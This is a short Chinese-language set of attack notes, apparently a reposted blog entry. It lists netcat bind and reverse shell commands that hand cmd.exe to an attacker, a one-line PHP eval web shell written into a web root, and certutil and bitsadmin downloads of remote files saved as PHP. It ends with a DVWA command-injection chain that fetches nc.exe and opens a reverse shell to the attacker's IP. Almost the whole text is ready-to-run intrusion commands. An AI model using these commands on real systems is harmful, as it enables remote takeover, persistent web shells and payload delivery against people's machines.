标签:txt 服务 dmi 状态 val 完成 bit window 通过
正向连接
受害者 IP 是直接暴漏在公网的 或者你们同属于一个内网
受害者:nc.exe -vlp 1234 -e cmd.exe
攻击者 nc 192.168.1.1 1234
nc -lvvp 80 直接监听内网所有主机80端口
反向连接
受害者 A 出于内网状态 192.168.1.25
攻击者 B 出于内网-外网的服务器 202.12.178.22
受害者 nc.exe -e cmd.exe 攻击者ip 1234
攻击者 nc -vv -l -p 1234
C:\phpStudy\PHPTutorial\WWW\nc.exe
C:\Windows\system32\cmd.exe
echo ^<?php @eval($_POST[‘cmd‘]); ?^>^ >C:\phpStudy\WWW\123.php
远程下载文件
certutil.exe -urlcache -split -f https://www.hack.com/robots.txt C:\phpStudy\WWW\111.php
bitsadmin /rawreturn /transfer down "http://192.168.1.115/robots.txt" "C:\phpStudy\WWW\111.php"
通过DVWA命令执行操作完成监听执行cmd
192.168.1.152|certutil.exe -urlcache -split -f http://192.168.1.189/phpStudy/PHPTutorial/WWW/netcat-1.11/nc.exe C:\phpStudy\nc.exe
192.168.1.152|C:\phpStudy\nc64.exe -e cmd.exe 192.168.1.189 82
192.168.1.189监听 nc.exe -lvvp 82
标签:txt 服务 dmi 状态 val 完成 bit window 通过
原文地址:https://www.cnblogs.com/lighting--/p/11368268.html